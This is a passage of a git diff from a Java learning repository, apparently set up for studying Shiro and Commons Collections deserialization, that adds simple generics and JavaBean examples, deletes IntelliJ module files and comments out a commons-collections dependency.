+        this.key = key;
+    }
+
+    public void setValue(V value) {
+        this.value = value;
+    }
+
+    @Override
+    public String toString() {
+        return "(" + key + ", " + value + ")";
+    }
+
+    public static void main(String[] args) {
+        KeyValuePair<String, Integer> pair1 = new KeyValuePair<>("age", 25);
+        KeyValuePair<String, String> pair2 = new KeyValuePair<>("name", "John");
+        KeyValuePair<String, String> pair3 = new KeyValuePair<>();
+
+        System.out.println(pair1.getKey() + ": " + pair1.getValue());
+        System.out.println(pair2.getKey() + ": " + pair2.getValue());
+    }
+}
+
diff --git a/commonscollection4/src/main/java/org/example/KeyValuePairExample.java b/commonscollection4/src/main/java/org/example/KeyValuePairExample.java
new file mode 100644
index 0000000..4af8d7f
--- /dev/null
+++ b/commonscollection4/src/main/java/org/example/KeyValuePairExample.java
@@ -0,0 +1,27 @@
+package org.example;
+
+import java.util.HashMap;
+import java.util.Map;
+
+public class KeyValuePairExample {
+    public static void main(String[] args) {
+        // 创建一个键值对类型的容器，使用HashMap作为实现
+        Map<String, Integer> keyValuePairs = new HashMap<>();
+
+        // 添加键值对
+        keyValuePairs.put("one", 1);
+        keyValuePairs.put("two", 2);
+        keyValuePairs.put("three", 3);
+
+        // 获取值
+        int value = keyValuePairs.get("two");
+        System.out.println("The value associated with 'two' is: " + value);
+
+        // 遍历键值对
+        for (Map.Entry<String, Integer> entry : keyValuePairs.entrySet()) {
+            String key = entry.getKey();
+            int val = entry.getValue();
+            System.out.println("Key: " + key + ", Value: " + val);
+        }
+    }
+}
diff --git a/commonscollection4/src/main/java/org/example/MaximumTest.java b/commonscollection4/src/main/java/org/example/MaximumTest.java
index 90dbb68..d5983ca 100644
--- a/commonscollection4/src/main/java/org/example/MaximumTest.java
+++ b/commonscollection4/src/main/java/org/example/MaximumTest.java
@@ -1,9 +1,11 @@
 package org.example;
 
+import org.jetbrains.annotations.NotNull;
+
 public class MaximumTest
 {
     // 比较三个值并返回最大值
-    public static <T extends Comparable<T>> T maximum(T x, T y, T z)
+    public static <T extends Comparable<T>> T maximum(T x, @NotNull T y, T z)
     {
         T max = x; // 假设x是初始最大值
         if ( y.compareTo( max ) > 0 ){
diff --git a/commonscollection4/src/main/java/org/example/Person.java b/commonscollection4/src/main/java/org/example/Person.java
new file mode 100644
index 0000000..17ff45b
--- /dev/null
+++ b/commonscollection4/src/main/java/org/example/Person.java
@@ -0,0 +1,44 @@
+package org.example;
+
+import org.apache.commons.beanutils.PropertyUtils;
+
+import java.beans.BeanInfo;
+import java.beans.IntrospectionException;
+import java.beans.Introspector;
+import java.beans.PropertyDescriptor;
+import java.lang.reflect.InvocationTargetException;
+
+public class Person {
+    private String name;
+    private int age;
+
+    public int getAge() {
+        return age;
+    }
+
+    public void setAge(int age) {
+        this.age = age;
+    }
+
+    public String getName() {
+        return name;
+    }
+
+    public void setName(String name) {
+        this.name = name;
+    }
+
+    public static void main(String[] args) throws IntrospectionException, InvocationTargetException, IllegalAccessException, NoSuchMethodException {
+        Person person = new Person();
+        person.setName("Leo");
+        String name = (String) PropertyUtils.getProperty(person, "name");
+        System.out.println(name);
+//        BeanInfo beanInfo = Introspector.getBeanInfo(Person.class);
+//        for(PropertyDescriptor pd : beanInfo.getPropertyDescriptors()){
+//            System.out.println(pd.getName());
+//            System.out.println("ReadMethod:"+pd.getReadMethod());
+//            System.out.println("WriteMethod:"+pd.getWriteMethod());
+//        }
+    }
+}
+
diff --git a/commonscollection4/src/main/java/org/example/Printer.java b/commonscollection4/src/main/java/org/example/Printer.java
new file mode 100644
index 0000000..c051cea
--- /dev/null
+++ b/commonscollection4/src/main/java/org/example/Printer.java
@@ -0,0 +1,14 @@
+package org.example;
+
+public class Printer {
+    public static void main(String[] args) {
+        String name = "sss";
+        int age = 12;
+        print(name, age);
+    }
+
+    public static <v,k> void print(k val1, v val2){
+        System.out.println(val1);
+        System.out.println(val2);
+    }
+}
diff --git a/shiroattack/shiroattack.iml b/shiroattack/shiroattack.iml
deleted file mode 100644
index b16e9c6..0000000
--- a/shiroattack/shiroattack.iml
+++ /dev/null
@@ -1,18 +0,0 @@
-<?xml version="1.0" encoding="UTF-8"?>
-<module org.jetbrains.idea.maven.project.MavenProjectsManager.isMavenModule="true" type="JAVA_MODULE" version="4">
-  <component name="NewModuleRootManager" LANGUAGE_LEVEL="JDK_1_8">
-    <output url="file://$MODULE_DIR$/target/classes" />
-    <output-test url="file://$MODULE_DIR$/target/test-classes" />
-    <content url="file://$MODULE_DIR$">
-      <sourceFolder url="file://$MODULE_DIR$/src/main/java" isTestSource="false" />
-      <excludeFolder url="file://$MODULE_DIR$/target" />
-    </content>
-    <orderEntry type="inheritedJdk" />
-    <orderEntry type="sourceFolder" forTests="false" />
-    <orderEntry type="library" name="Maven: org.apache.shiro:shiro-core:1.2.4" level="project" />
-    <orderEntry type="library" name="Maven: org.slf4j:slf4j-api:1.6.4" level="project" />
-    <orderEntry type="library" name="Maven: commons-beanutils:commons-beanutils:1.8.3" level="project" />
-    <orderEntry type="library" name="Maven: org.javassist:javassist:3.27.0-GA" level="project" />
-    <orderEntry type="library" name="Maven: commons-collections:commons-collections:3.2.1" level="project" />
-  </component>
-</module>
\ No newline at end of file
diff --git a/shirodemo/pom.xml b/shirodemo/pom.xml
index f4e48d6..dded59f 100644
--- a/shirodemo/pom.xml
+++ b/shirodemo/pom.xml
@@ -45,11 +45,11 @@
     </dependency>
 
     <!-- https://mvnrepository.com/artifact/commons-collections/commons-collections -->
-    <dependency>
-      <groupId>commons-collections</groupId>
-      <artifactId>commons-collections</artifactId>
-      <version>3.2.1</version>
-    </dependency>
+<!--    <dependency>-->
+<!--      <groupId>commons-collections</groupId>-->
+<!--      <artifactId>commons-collections</artifactId>-->
+<!--      <version>3.2.1</version>-->
+<!--    </dependency>-->
     <!-- https://mvnrepository.com/artifact/commons-logging/commons-logging -->
     <dependency>
       <groupId>commons-logging</groupId>
diff --git a/shirodemo/shirodemo.iml b/shirodemo/shirodemo.iml
deleted file mode 100644
index 17932bb..0000000
--- a/shirodemo/shirodemo.iml
+++ /dev/null
@@ -1,9 +0,0 @@
-<?xml version="1.0" encoding="UTF-8"?>
-<module org.jetbrains.idea.maven.project.MavenProjectsManager.isMavenModule="true" type="JAVA_MODULE" version="4">
-  <component name="NewModuleRootManager">
-    <content url="file://$MODULE_DIR$">
-      <sourceFolder url="file://$MODULE_DIR$/src" isTestSource="false" />
-      <excludeFolder url="file://$MODULE_DIR$/target" />
-    </content>
-  </component>
-</module>
\ No newline at end of file